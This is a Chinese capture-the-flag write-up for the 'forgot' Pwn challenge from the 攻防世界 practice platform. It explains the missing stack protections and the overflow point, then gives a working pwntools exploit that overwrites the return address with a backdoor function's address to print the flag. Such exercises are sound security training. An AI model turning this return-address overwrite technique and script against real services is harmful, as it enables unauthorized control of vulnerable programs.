标签:后门 攻防 flag io forgot Pwn payload 溢出
攻防世界 Pwn forgot
1.题目下载地址
2.checksec
没有canary,可以随便溢出
没有PIE。可以随便使用后门函数
3.IDA
可以看到有两个溢出点
第一处限制了输入大小,我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以
接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了
4.exp
from pwn import *
io = remote('111.200.241.244',56240)
# io = process("./forgot")
flag_addr = 0x080486CC
io.recv()
io.sendline("kk")
io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)
io.interactive()
得到flag
标签:后门,攻防,flag,io,forgot,Pwn,payload,溢出 来源: https://blog.csdn.net/MrTreebook/article/details/122017668
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。